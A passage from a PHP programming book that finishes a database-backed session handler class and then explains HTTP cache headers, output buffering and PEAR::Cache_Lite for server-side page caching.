  • 382. 358 The PHP Anthology { error_log('Error reading the session data table in the' . ' session writing method.'); error_log(' Query with error: '.$sql); error_log(' Reason given:'.$e->getMessage()."n"); return false; } The $res variable contains the result of our database lookup. Based upon this result, we either update the existing session record with an SQL UPDATE query or insert a new one with an SQL INSERT query: DatabaseSession.class.php (excerpt) try { if (count($res) > 0) { $sql = "UPDATE {$this->sess_table} SET" . " sess_last_acc = NOW(), sess_data = :data" . " WHERE sess_id = :id"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':data', $data); $stmt->bindParam(':id', $sess_id); } else { $sql ="INSERT INTO {$this->sess_table}(sess_id," . " sess_start, sess_last_acc," . " sess_data) VALUES (:id, NOW(), NOW(), :data)"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':id', $sess_id); $stmt->bindParam(':data', $data); } $res = $stmt->execute(); }
  • 383. Access Control 359 If you know you’ll only be using MySQL as your database, consider using the RE­ 14 PLACE syntax instead. Since we don’t want to limit our class to MySQL, we use the longer but more compatible method above. Finally, we need to catch any PDOExceptions and return true or false: DatabaseSession.class.php (excerpt) catch (PDOException $e) { error_log('Error writing to the session data table.'); error_log('Query with error: '.$sql); error_log('Reason given:'.$e->getMessage()."n"); return false; } return true; } Our next task is to implement a destroy function, which, as the name suggests, is called when the session is destroyed. It receives the session ID as an argument and must return either true or false. In our class method destroy, we simply delete the session from the database using the session ID as the key, and return false if an error occurs or true if the operation succeeds: DatabaseSession.class.php (excerpt) public function destroy($sess_id) { try { $sql = "DELETE FROM {$this->sess_table} WHERE sess_id = :id"; $stmt = $this->db->prepare($sql); $stmt->execute(array(':id'=>$sess_id)); } catch (PDOException $e) { error_log('Error destroying the session.'); error_log('Query with error: '.$sql); 14 REPLACE is a MySQL extension to the SQL standard that either inserts a new row, or deletes an old row and inserts the new row if the old row had the same value as the new row for a PRIMARY KEY or UNIQUE index. You can read more about it at http://dev.mysql.com/doc/refman/5.1/en/replace.html.
  • 384. 360 The PHP Anthology error_log('Reason given:'.$e->errorMessage()."n"); return false; } return true; } The final function we are required to implement is the gc, or garbage collection, function, which is used to clean out any old sessions that were never closed properly. It receives an integer argument for the “time to live” (TTL) value for a session. In our class method, gc, we delete any session record where the last access time is less then the current time, minus the TTL value: DatabaseSession.class.php (excerpt) public function gc($ttl) { $end = time() - $ttl; try { $sql = "DELETE FROM {$this->sess_table} WHERE" . " sess_last_acc <:end"; $stmt = $this->db->prepare($sql); $stmt->execute(array(':id'=>$end)); } catch (PDOException $e) { error_log('Error with the garbage collection method of the' . ' session class.'); error_log('Query with error: '.$sql); error_log('Reason given:'.$e->getMessage()); return false; } return true; } The garbage collection method is called by PHP as dictated by the php.ini settings session.gc_probability and session.gc_divisor, and is checked every time a new session is started. Again, you can call it manually in the session close method if you wish.
  • 385. Access Control 361 MySQL MyISAM Engine Performance If your session table sees high rates of insertions and deletions, you should consider adding an OPTIMIZE TABLE query to the garbage collection function to regain memory and help increase performance. For more information on OPTIMIZE TABLE, see the MySQL manual.15 Finally, we implement a class __destruct method. This step is necessitated by the changes that were made in how PHP sessions are closed after version 5.0.5. Basically, we just have to make sure the session is explicitly written and closed by calling the session_write_close function. You can read more about this task on the manual page.16 Here’s our __destruct method and the end of our class definition: DatabaseSession.class.php (excerpt) public function __destruct() { session_write_close(); } } Using the DatabaseSession Class Here’s a simple script to test our new DatabaseSession class: dbsession.php (excerpt) <?php require_once 'DatabaseSession.class.php'; $session = new DatabaseSession('user', 'secret', 'session', 'access_control','localhost'); session_set_save_handler(array($session, 'open'), array($session, 'close'), array($session, 'read'), array($session, 'write'), array($session, 'destroy'), array($session, 'gc') ); 15 http://dev.mysql.com/doc/refman/5.1/en/optimize-table.html 16 http://www.php.net/session_set_save_handler/
  • 386. 362 The PHP Anthology session_start(); $name = (isset($_SESSION['name']))? $_SESSION['name'] :''; if ($name !== '') { echo 'Welcome ', $name, ' to your session!'; } else { echo 'Lets start the session!'; $_SESSION['name'] = 'PHP'; } ?> We include our DatabaseSession class, then instantiate the DatabaseSession object. Next, we use session_set_save_handler to register our custom PHP session- handling methods. Then we have a quick little demonstration to show us that the session is working—the first time you load the web page you should see the message “Let’s start the session!" We then set the $_SESSION['name'] to PHP. When you re­ fresh the web page, the message should change to “Welcome PHP to your session!” which indicates that our session data is being stored and retrieved correctly in the database. Welcome to database-saved sessions! Summary In this chapter we’ve investigated HTTP authentication and PHP sessions, and created a complete access control system that can manage user registrations, pass­ word resets, and changes, including authorization, groups, and multiple permission levels. Phew! Well, there you have it—total access control over your site! Now you have the power to bark “Denied” at those that shouldn’t be in restricted areas, and roll out the red carpet for those that should. Can you feel the warm glow of power gathering within you? Will you use it for good—or evil? Either way, I hope you’ve enjoyed it and learned a bit along the way.
  • 387. 11 Chapter Caching In the good old days when building web sites was as easy as knocking up a few HTML pages, the delivery of a web page to a browser was a simple matter of having the web server fetch a file. A site’s visitors would see its small, text-only pages almost immediately, unless they were using particularly slow modems. Once the page was downloaded, the browser would cache it somewhere on the local computer so that, should the page be requested again, after performing a quick check with the server to ensure the page hadn’t been updated, the browser could display the locally cached version. Pages were served as quickly and efficiently as possible, and everyone was happy. Then dynamic web pages came along and spoiled the party by introducing two problems: ■ When a request for a dynamic web page is received by the server, some interme­ diate processing must be completed, such as the execution of scripts by the PHP engine. This processing introduces a delay before the web server begins to deliver the output to the browser. This may not be a significant delay where simple PHP scripts are concerned, but for a more complex application, the PHP engine may have a lot of work to do before the page is finally ready for delivery. This extra
  • 388. 364 The PHP Anthology work results in a noticeable time lag between the user’s requests and the actual display of pages in the browser. ■ A typical web server, such as Apache, uses the time of file modification to inform a web browser of a requested page’s age, allowing the browser to take appropriate caching action. With dynamic web pages, the actual PHP script may change only occasionally; meanwhile, the content it displays, which is often fetched from a database, will change frequently. The web server has no way of discerning up­ dates to the database, so it doesn’t send a last modified date. If the client (that is, the user’s browser) has no indication of how long the data will remain valid, it will take a guess. This is problematic if the browser decides to use a locally cached version of the page which is now out of date, or if the browser decides to request from the server a fresh copy of the page, which actually has no new content, making the request redundant. The web server will always respond with a freshly constructed version of the page, regardless of whether or not the data in the database has actually changed. To avoid the possibility of a web site visitor viewing out-of-date content, most web developers use a meta tag or HTTP headers to tell the browser never to use a cached version of the page. However, this negates the web browser’s natural ability to cache web pages, and entails some serious disadvantages. For example, the content delivered by a dynamic page may only change once a day, so there’s certainly a benefit to be gained by having the browser cache a page—even if only for 24 hours. If you’re working with a small PHP application, it’s usually possible to live with both issues. But as your site increases in complexity—and attracts more traffic—you’ll begin to run into performance problems. Both these issues can be solved, however: the first with server-side caching; the second, by taking control of client-side caching from within your application. The exact approach you use to solve these problems will depend on your application, but in this chapter, we’ll consider both PHP and a number of class libraries from PEAR as possible panaceas for your web page woes. Note that in this chapter’s discussions of caching, we’ll look at only those solutions that can be implemented in PHP. For a more general introduction, the definitive
  • 389. Caching 365 discussion of web caching is represented by Mark Nottingham’s tutorial.1 Further­ more, the solutions in this chapter should not be confused with some of the script caching solutions that work on the basis of optimizing and caching compiled PHP scripts, such as Zend Accelerator2 and ionCube PHP Accelerator.3 How do I prevent web browsers from caching a page? If timely information is crucial to your web site and you wish to prevent out-of-date content from ever being visible, you need to understand how to prevent web browsers—and proxy servers—from caching pages in the first place. Solutions There are two possible approaches we could take to solving this problem: using HTML meta tags, and using HTTP headers. Using HTML Meta Tags The most basic approach to the prevention of page caching is one that utilizes HTML meta tags: <meta http-equiv="expires" content="Mon, 26 Jul 1997 05:00:00 GMT"/> <meta http-equiv="pragma" content="no-cache" /> The insertion of a date that’s already passed into the Expires meta tag tells the browser that the cached copy of the page is always out of date. Upon encountering this tag, the browser usually won’t cache the page. Although the Pragma: no-cache meta tag isn’t guaranteed, it’s a fairly well-supported convention that most web browsers follow. However, the two issues associated with this approach, which we’ll discuss below, may prompt you to look at the alternative solution. Using HTTP Headers A better approach is to use the HTTP protocol itself, with the help of PHP’s header function, to produce the equivalent of the two HTML meta tags above: 1 http://www.mnot.net/cache_docs/ 2 http://www.zend.com/ 3 http://www.php-accelerator.co.uk/
  • 390. 366 The PHP Anthology <?php header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); header('Pragma: no-cache'); ?> We can go one step further than this, using the Cache-Control header that’s suppor­ ted by HTTP 1.1-capable browsers: <?php header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: post-check=0, pre-check=0', FALSE); header('Pragma: no-cache'); ?> For a precise description of HTTP 1.1 Cache-Control headers, have a look at the W3C’s HTTP 1.1 RFC.4 Another great source of information about HTTP headers, which can be applied readily to PHP, is mod_perl’s documentation on issuing correct headers.5 Discussion Using the Expires meta tag sounds like a good approach, but two problems are as­ sociated with it: ■ The browser first has to download the page in order to read the meta tags. If a tag wasn’t present when the page was first requested by a browser, the browser will remain blissfully ignorant and keep its cached copy of the original. ■ Proxy servers that cache web pages, such as those common to ISPs, generally won’t read the HTML documents themselves. A web browser might know that it shouldn’t cache the page, but the proxy server between the browser and the web server probably doesn’t—it will continue to deliver the same out-of-date page to the client. On the other hand, using the HTTP protocol to prevent page caching essentially guarantees that no web browser or intervening proxy server will cache the page, so 4 http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9 5 http://perl.apache.org/docs/general/correct_headers/correct_headers.html
  • 391. Caching 367 visitors will always receive the latest content. In fact, the first header should accom­ plish this on its own; this is the best way to ensure a page is not cached. The Cache- Control and Pragma headers are added for some degree of insurance. Although they don’t work on all browsers or proxies, the Cache-Control and Pragma headers will catch some cases in which the Expires header doesn’t work as intended—if the client computer’s date is set incorrectly, for example. Of course, to disallow caching entirely introduces the problems we discussed at the start of this chapter: it negates the web browser’s natural ability to cache pages, and can create unnecessary overhead, as new versions of pages are always requested, even though those pages may not have been updated since the browser’s last request. We’ll look at the solution to these issues in just a moment. How do I control client-side caching? We addressed the task of disabling client-side caching in “How do I prevent web browsers from caching a page?”, but disabling the cache is rarely the only (or best) option. Here we’ll look at a mechanism that allows us to take advantage of client-side caches in a way that can be controlled from within a PHP script. Apache Required! This approach will only work if you’re running PHP as an Apache web server module, because it requires use of the function getallheaders—which only works with Apache—to fetch the HTTP headers sent by a web browser. Solutions In controlling client-side caching you have two alternatives. You can set a date on which the page will expire, or respond to the browser’s request headers. Let’s see how each of these tactics is executed. Setting a Page Expiry Header The header that’s easiest to implement is the Expires header—we use it to set a date on which the page will expire, and until that time, web browsers are allowed to use a cached version of the page. Here’s an example of this header at work:
  • 392. 368 The PHP Anthology expires.php (excerpt) <?php function setExpires($expires) { header( 'Expires: '.gmdate('D, d M Y H:i:s', time()+$expires).'GMT'); } setExpires(10); echo ( 'This page will self destruct in 10 seconds<br />' ); echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' ); echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' ); ?> In this example, we created a custom function called setExpires that sets the HTTP Expires header to a point in the future, defined in seconds. The output of the above example shows the current time in GMT, and provides a link that allows us to view the page again. If we follow this link, we’ll notice the time updates only once every ten seconds. If you like, you can also experiment by using your browser’s Refresh button to tell the browser to refresh the cache, and watching what happens to the displayed date. Acting on the Browser’s Request Headers A more useful approach to client-side cache control is to make use of the Last- Modified and If-Modified-Since headers, both of which are available in HTTP 1.0. This action is known technically as performing a conditional GET request; whether your script returns any content depends on the value of the incoming If- Modified-Since request header. If you use PHP version 4.3.0 and above on Apache, the HTTP headers are accessible with the functions apache_request_headers and apache_response_headers. Note that the function getallheaders has become an alias for the new apache_request_headers function. This approach requires that you send a Last-Modified header every time your PHP script is accessed. The next time the browser requests the page, it sends an If- Modified-Since header containing a time; your script can then identify whether the page has been updated since that time. If it hasn’t, your script sends an HTTP 304 status code to indicate that the page hasn’t been modified, and exits before sending the body of the page.
  • 393. Caching 369 Let’s see these headers in action. The example below uses the modification date of a text file. To simulate updates, we first need to create a way to randomly write to the file: ifmodified.php (excerpt) <?php $file = 'ifmodified.txt'; $random = array (0,1,1); shuffle($random); if ( $random[0] == 0 ) { $fp = fopen($file, 'w'); fwrite($fp, 'x'); fclose($fp); } $lastModified = filemtime($file); Our simple randomizer provides a one-in-three chance that the file will be updated each time the page is requested. We also use the filemtime function to obtain the last modified time of the file. Next, we send a Last-Modified header that uses the modification time of the text file. We need to send this header for every page we render, to cause visiting browsers to send us the If-Modifed-Since header upon every request: ifmodified.php (excerpt) header('Last-Modified: ' . gmdate('D, d M Y H:i:s', $lastModified) . ' GMT'); Our use of the getallheaders function ensures that PHP gives us all the incoming request headers as an array. We then need to check that the If-Modified-Since header actually exists; if it does, we have to deal with a special case caused by older Mozilla browsers (earlier than version 6), which appended an illegal extra field to their If-Modified-Since headers. We use PHP’s strtotime function to generate a timestamp from the date the browser sent us. If there’s no such header, we set this timestamp to zero, which forces PHP to give the visitor an up-to-date copy of the page:
  • 394. 370 The PHP Anthology ifmodified.php (excerpt) $request = getallheaders(); if (isset($request['If-Modified-Since'])) { $modifiedSince = explode(';', $request['If-Modified-Since']); $modifiedSince = strtotime($modifiedSince[0]); } else { $modifiedSince = 0; } Finally, we check to see whether or not the cache has been modified since the last time the visitor received this page. If it hasn’t, we simply send a 304 Not Modified response header and exit the script, saving bandwidth and processing time by prompting the browser to display its cached copy of the page: ifmodified.php (excerpt) if ($lastModified <= $modifiedSince) { header('HTTP/1.1 304 Not Modified'); exit(); } echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' ); echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' ); ?> Remember to use the “View Again” link when you run this example (clicking the Refresh button usually clears your browser’s cache). If you click on the link re­ peatedly, the cache will eventually be updated; your browser will throw out its cached version and fetch a new page from the server. If you combine the Last-Modified header approach with time values that are already available in your application—for example, the time of the most recent news art­ icle—you should be able to take advantage of web browser caches, saving bandwidth and improving your application’s perceived performance in the process.
  • 395. Caching 371 Be very careful to test any caching performed in this manner, though; if you get it wrong, you may cause your visitors to consistently see out-of-date copies of your site. Discussion HTTP dates are always calculated relative to Greenwich Mean Time (GMT). The PHP function gmdate is exactly the same as the date function, except that it auto­ matically offsets the time to GMT based on your server’s system clock and regional settings. When a browser encounters an Expires header, it caches the page. All further re­ quests for the page that are made before the specified expiry time use the cached version of the page—no request is sent to the web server. Of course, client-side caching is only truly effective if the system time on the computer is accurate. If the computer’s time is out of sync with that of the web server, you run the risk of pages either being cached improperly, or never being updated. The Expires header has the advantage that it’s easy to implement; in most cases, however, unless you’re a highly organized person, you won’t know exactly when a given page on your site will be updated. Since the browser will only contact the server after the page has expired, there’s no way to tell browsers that the page they’ve cached is out of date. In addition, you also lose some knowledge of the traffic visiting your web site, since the browser will not make contact with the server when it re­ quests a page that’s been cached. How do I examine HTTP headers in my browser? How can you actually check that your application is running as expected, or debug your code, if you can’t actually see the HTTP headers? It’s worth knowing exactly which headers your script is sending, particularly when you’re dealing with HTTP cache headers. Solution Several worthy tools are available to help you get a closer look at your HTTP headers:
  • 396. 372 The PHP Anthology LiveHTTPHeaders (http://livehttpheaders.mozdev.org/) This add-on to the Firefox browser is a simple but very handy tool for examining request and response headers while you’re browsing. Firebug (http://getfirebug.org/) Another useful Firefox add-on, Firebug is a tool whose interface offers a dedic­ ated tab for examining HTTP request information. HTTPWatch (http://www.httpwatch.com/) This add-on to Internet Explorer for HTTP viewing and debugging is similar to LiveHTTPHeaders above. Charles Web Debugging Proxy (http://getcharles.com/) Available for Windows, Mac OS X, and Linux or Unix, the Charles Web Debug­ ging Proxy is a proxy server that allows developers to see all the HTTP traffic between their browsers and the web servers to which they connect. Any of these tools will allow you to inspect the communication between the server and browser. How do I cache file downloads with Internet Explorer? If you’re developing file download scripts for Internet Explorer users, you might notice a few issues with the download process. In particular, when you’re serving a file download through a PHP script that uses headers such as Content-Disposi­ tion: attachment, filename=myFile.pdf or Content-Disposition: inline, filename=myFile.pdf, and that tells the browser not to cache pages, Internet Ex­ plorer won’t deliver that file to the user. Solutions Internet Explorer handles downloads in a rather unusual manner: it makes two re­ quests to the web site. The first request downloads the file and stores it in the cache before making a second request, the response to which is not stored. The second request invokes the process of delivering the file to the end user in accordance with the file’s type—for instance, it starts Acrobat Reader if the file is a PDF document. Therefore, if you send the cache headers that instruct the browser not to cache the
  • 397. Caching 373 page, Internet Explorer will delete the file between the first and second requests, with the unfortunate result that the end user receives nothing! If the file you’re serving through the PHP script won’t change, one solution to this problem is simply to disable the “don’t cache” headers, pragma and cache-control, which we discussed in “How do I prevent web browsers from caching a page?”, for the download script. If the file download will change regularly, and you want the browser to download an up-to-date version of it, you’ll need to use the Last-Modified header that we met in “How do I control client-side caching?”, and ensure that the time of modific­ ation remains the same across the two consecutive requests. You should be able to achieve this goal without affecting users of browsers that handle downloads correctly. One final solution is to write the file to the file system of your web server and simply provide a link to it, leaving it to the web server to report the cache headers for you. Of course, this may not be a viable option if the file is supposed to be secured. How do I use output buffering for server-side caching? Server-side processing delay is one of the biggest bugbears of dynamic web pages. We can reduce server-side delay by caching output. The page is generated normally, performing database queries and so on with PHP; however, before sending it to the browser, we capture and store the finished page somewhere—in a file, for instance. The next time the page is requested, the PHP script first checks to see whether a cached version of the page exists. If it does, the script sends the cached version straight to the browser, avoiding the delay involved in rebuilding the page. Solution Here, we’ll look at PHP’s in-built caching mechanism, the output buffer, which can be used with whatever page rendering system you prefer (templates or no templates). Consider situations in which your script displays results using, for example, echo or print, rather than sending the data directly to the browser. In such cases, you can use PHP’s output control functions to store the data in an in-memory buffer, which your PHP script has both access to and control over.
  • 398. 374 The PHP Anthology Here’s a simple example that demonstrates how the output buffer works: buffer.php (excerpt) <?php ob_start(); echo '1. Place this in the buffer<br />'; $buffer = ob_get_contents(); ob_end_clean(); echo '2. A normal echo<br />'; echo $buffer; ?> The buffer itself stores the output as a string. So, in the above script, we commence buffering with the ob_start function, and use echo to display a piece of text which is stored in the output buffer automatically. We then use the ob_get_contents function to fetch the data the echo statement placed in the buffer, and store it in the $buffer variable. The ob_end_clean function stops the output buffer and empties the contents; the alternative approach is to use the ob_end_flush function, which displays the contents of the buffer. The above script displays the following output: 2. A normal echo 1. Place this in the buffer In other words, we captured the output of the first echo, then sent it to the browser after the second echo. As this simple example suggests, output buffering can be a very powerful tool when it comes to building your site; it provides a solution for caching, as we’ll see in a moment, and is also an excellent way to hide errors from your site’s visitors, as is discussed in Chapter 9. Output buffering even provides a possible alternative to browser redirection in situations such as user authentication. In order to improve the performance of our site, we can store the output buffer contents in a file. We can then call on this file for the next request, rather than having to rebuild the output from scratch again. Let’s look at a quick example of this technique. First, our example script checks for the presence of a cache file:
  • 399. Caching 375 sscache.php (excerpt) <?php if (file_exists('./cache/page.cache')) { readfile('./cache/page.cache'); exit(); } If the script finds the cache file, we simply output its contents and we’re done! If the cache file is not found, we proceed to output the page using the output buffer: sscache.php (excerpt) ob_start(); ?> <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cached Page</title> </head> <body> This page was cached with PHP's <a href="http://www.php.net/outcontrol" >Output Control Functions</a> </body> </html> <?php $buffer = ob_get_contents(); ob_end_flush(); Before we flush the output buffer to display our page, we make sure to store the buffer contents in the $buffer variable. The final step is to store the saved buffer contents in a text file:
  • 400. 376 The PHP Anthology sscache.php (excerpt) $fp = fopen('./cache/page.cache','w'); fwrite($fp,$buffer); fclose($fp); ?> The page.cache file contents are exactly same as the HTML that was rendered by the script: cache/page.cache (excerpt) <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Cached Page</title> </head> <body> This page was cached with PHP's <a href="http://www.php.net/outcontrol" >Output Control Functions</a> </body> </html> Discussion For an example that shows how to use PHP’s output buffering capabilities to handle errors more elegantly, have a look at the PHP Freaks article “Introduction to Output Buffering,” by Derek Ford.6 What About Template Caching? Template engines often include template caching features—Smarty is a case in point.7 Usually, these engines offer a built-in mechanism for storing a compiled version of a template (that is, the native PHP generated from the template), which prevents us developers from having to recompile the template every time a page is requested. 6 http://www.phpfreaks.com/tutorials/59/0.php 7 http://smarty.php.net/
  • 401. Caching 377 This process should not be confused with output—or content—caching, which refers to the caching of the rendered HTML (or other output) that PHP sends to the browser. In addition to the content cache mechanisms discussed in this chapter, Smarty can cache the contents of the HTML page. Whether you use Smarty’s content cache or one of the alternatives discussed in this chapter, you can successfully use both template and content caching together on the same site. HTTP Headers and Output Buffering Output buffering can help solve the most common problem associated with the header function, not to mention the issues surrounding session_start and set_cookie. Normally, if you call any of these functions after page output has begun, you’ll get a nasty error message. When output buffering’s turned on, the only output types that can escape the buffer are HTTP headers. If you use ob_start at the very beginning of your application’s execution, you can send headers at whichever point you like, without encountering the usual errors. You can then write out the buffered page content all at once, when you’re sure that no more HTTP headers are required. Use Output Buffering Responsibly While output buffering can helpfully solve all our header problems, it should not be used solely for that reason. By ensuring that all output is generated after all the headers are sent, you’ll save the time and resource overheads involved in using output buffers. How do I cache just the parts of a page that change infrequently? Caching an entire page is a simplistic approach to output buffering. While it’s easy to implement, that approach negates the real benefits presented by PHP’s output control functions to improve your site’s performance in a manner that’s relevant to the varying lifetimes of your content. No doubt, some parts of the page that you send to visitors will change very rarely, such as the page’s header, menus, and footer. But other parts—for example, the list of comments on your blog posts—may change quite often. Fortunately, PHP allows you to cache sections of the page separately.
  • 402. 378 The PHP Anthology Solution Output buffering can be used to cache sections of a page in separate files. The page can then be rebuilt for output from these files. This technique eliminates the need to repeat database queries, while loops, and so on. You might consider assigning each block of the page an expiry date after which the cache file is recreated; alternatively, you may build into your application a mechanism that deletes the cache file every time the content it stores is changed. Let’s work through an example that demonstrates the principle. Firstly, we’ll create two helper functions, writeCache and readCache. Here’s the writeCache function: smartcache.php (excerpt) <?php function writeCache($content, $filename) { $fp = fopen('./cache/' . $filename, 'w'); fwrite($fp, $content); fclose($fp); } The writeCache function is quite simple; it just writes the content of the first argu­ ment to a file with the name specified in the second argument, and saves that file to a location in the cache directory. We’ll use this function to write our HTML to the cache files. The readCache function will return the contents of the cache file specified in the first argument if it has not expired—that is, the file’s last modified time is not older than the current time minus the number of seconds specified in the second argument. If it has expired or the file does not exist, the function returns false: smartcache.php (excerpt) function readCache($filename, $expiry) { if (file_exists('./cache/' . $filename)) { if ((time() - $expiry) > filemtime('./cache/' . $filename)) {
  • 403. Caching 379 return false; } $cache = file('./cache/' . $filename); return implode('', $cache); } return false; } For the purposes of demonstrating this concept, I’ve used a procedural approach. However, I wouldn’t recommend doing this in practice, as it will result in very messy code and is likely to cause issues with file locking. For example, what happens when someone accesses the cache at the exact moment it’s being updated? Better solutions will be explained later on in the chapter. Let’s continue this example. After the output buffer is started, processing begins. First, the script calls readCache to see whether the file header.cache exists; this contains the top of the page—the HTML <head> tag and the start <body> tag. We’ve used PHP’s date function to display the time at which the page was actually rendered, so you’ll be able to see the different cache files at work when the page is displayed: smartcache.php (excerpt) ob_start(); if (!$header = readCache('header.cache', 604800)) { ?> <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Chunked Cached Page</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> </head> <body> <p>The header time is now: <?php echo date('H:i:s'); ?></p> <?php $header = ob_get_contents();
  • 404. 380 The PHP Anthology ob_clean(); writeCache($header,'header.cache'); } Note what happens when a cache file isn’t found: the header content is output and assigned to a variable, $header, with ob_get_contents, after which the ob_clean function is called to empty the buffer. This allows us to capture the output in “chunks” and assign them to individual cache files with the writeCache function. The header of the page is now stored as a file, which can be reused without our needing to rerender the page. Look back to the start of the if condition for a moment. When we called readCache, we gave it an expiry time of 604800 seconds (one week); readCache uses the file modification time of the cache file to determine whether the cache is still valid. For the body of the page, we’ll use the same process as before. However, this time, when we call readCache, we’ll use an expiry time of five seconds; the cache file will be updated whenever it’s more than five seconds old: smartcache.php (excerpt) if (!$body = readCache('body.cache', 5)) { echo 'The body time is now: ' . date('H:i:s') . '<br />'; $body = ob_get_contents(); ob_clean(); writeCache($body, 'body.cache'); } The page footer is effectively the same as the header. After the footer, the output buffering is stopped and the contents of the three variables that hold the page data are displayed: smartcache.php (excerpt) if (!$footer = readCache('footer.cache', 604800)) { ?> <p>The footer time is now: <?php echo date('H:i:s'); ?></p> </body> </html>
  • 405. Caching 381 <?php $footer = ob_get_contents(); ob_clean(); writeCache($footer, 'footer.cache'); } ob_end_clean(); echo $header . $body . $footer; ?> The end result looks like this: The header time is now: 17:10:42 The body time is now: 18:07:40 The footer time is now: 17:10:42 The header and footer are updated on a weekly basis, while the body is updated whenever it is more than five seconds old. If you keep refreshing the page, you’ll see the body time updating. Discussion Note that if you have a page that builds content dynamically, based on a number of variables, you’ll need to make adjustments to the way you handle your cache files. For example, you might have an online shopping catalog whose listing pages are defined by a URL such as: http://example.com/catalogue/view.php?category=1&page=2 This URL should show page two of all items in category one; let’s say this is the category for socks. But if we were to use the caching code above, the results of the first page of the first category we looked at would be cached, and shown for any request for any other page or category, until the cache expiry time elapsed. This would certainly confuse the next visitor who wanted to browse the category for shoes—that person would see the cached content for socks! To avoid this issue, you’ll need to incorporate the category ID and page number in to the cache file name like so:
  • 406. 382 The PHP Anthology $cache_filename = 'catalogue_' . $category_id . '_' . $page . '.cache'; if (!$catalogue = readCache($cache_filename, 604800)) { ⋮ display the category HTML… } This way, the correct cached content can be retrieved for every request. Nesting Buffers You can nest one buffer within another practically ad infinitum simply by calling ob_start more than once. This can be useful if you have multiple operations that use the output buffer, such as one that catches the PHP error messages, and another that deals with caching. Care needs to be taken to make sure that ob_end_flush or ob_end_clean is called every time ob_start is used. How do I use PEAR::Cache_Lite for server-side caching? The previous solution explored the ideas behind output buffering using the PHP ob_* functions. Although we mentioned at the time, that approach probably isn’t the best way to meet to dual goals of keeping your code maintainable and having a reliable caching mechanism. It’s time to see how we can put a caching system into action in a manner that will be reliable and easy to maintain. Solution In the interests of keeping your code maintainable and having a reliable caching mechanism, it’s a good idea to delegate the responsibility of caching logic to classes you trust. In this case, we’ll use a little help from PEAR::Cache_Lite (version 1.7.2 is used in the examples here).8 Cache_Lite provides a solid yet easy-to-use library for caching, and handles issues such as: file locking; creating, checking for, and deleting cache files; controlling the output buffer; and directly caching the results from function and class method calls. More to the point, Cache_Lite should be rel­ 8 http://pear.php.net/package/Cache_Lite/
  • 407. Caching 383 atively easy to apply to an existing application, requiring only minor code modific­ ations. Cache_Lite has four main classes. First is the base class, Cache_Lite, which deals purely with creating and fetching cache files, but makes no use of output buffering. This class can be used alone for caching operations in which you have no need for output buffering, such as storing the contents of a template you’ve parsed with PHP. The examples here will not use Cache_Lite directly, but will instead focus on the three subclasses. Cache_Lite_Function can be used to call a function or class method and cache the result, which might prove useful for storing a MySQL query result set, for example. The Cache_Lite_Output class uses PHP’s output control functions to catch the output generated by your script and store it in cache files; it allows you to perform tasks such as those we completed in “How do I cache just the parts of a page that change infrequently?”. The Cache_Lite_File class bases cache expiry on the timestamp of a master file, with any cache file being deemed to have expired if it is older than the timestamp. Let’s work through an example that shows how you might use Cache_Lite to create a simple caching solution. When we’re instantiating any child classes of Cache_Lite, we must first provide an array of options that determine the behavior of Cache_Lite itself. We’ll look at these options in detail in a moment. Note that the cacheDir directory we specify must be one to which the script has read and write access: cachelite.php (excerpt) <?php require_once 'Cache/Lite/Output.php'; $options = array( 'cacheDir' => './cache/', 'writeControl' => 'true', 'readControl' => 'true', 'fileNameProtection' => false, 'readControlType' => 'md5' ); $cache = new Cache_Lite_Output($options); For each chunk of content that we want to cache, we need to set a lifetime (in seconds) for which the cache should live before it’s refreshed. Next, we use the start method, available only in the Cache_Lite_Output class, to turn on output
  • 408. 384 The PHP Anthology buffering. The two arguments passed to the start method are an identifying value for this particular cache file, and a cache group. The group is an identifier that allows a collection of cache files to be acted upon; it’s possible to delete all cache files in a given group, for example (more on this in a moment). The start method will check to see if a valid cache file is available and, if so, it will begin outputting the cache contents. If a cache file is not available, start will return false and begin caching the following output. Once the output for this chunk has finished, we use the end method to stop buffering and store the content as a file: cachelite.php (excerpt) $cache->setLifeTime(604800); if (!$cache->start('header', 'Static')) { ?> <!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>PEAR::Cache_Lite example</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> </head> <body> <h2>PEAR::Cache_Lite example</h2> <p>The header time is now: <?php echo date('H:i:s'); ?></p> <?php $cache->end(); } To cache the body and footer, we follow the same procedure we used for the header. Note that, again, we specify a five-second lifetime when caching the body: cachelite.php (excerpt) $cache->setLifeTime(5); if (!$cache->start('body', 'Dynamic')) { echo 'The body time is now: ' . date('H:i:s') . '<br />'; 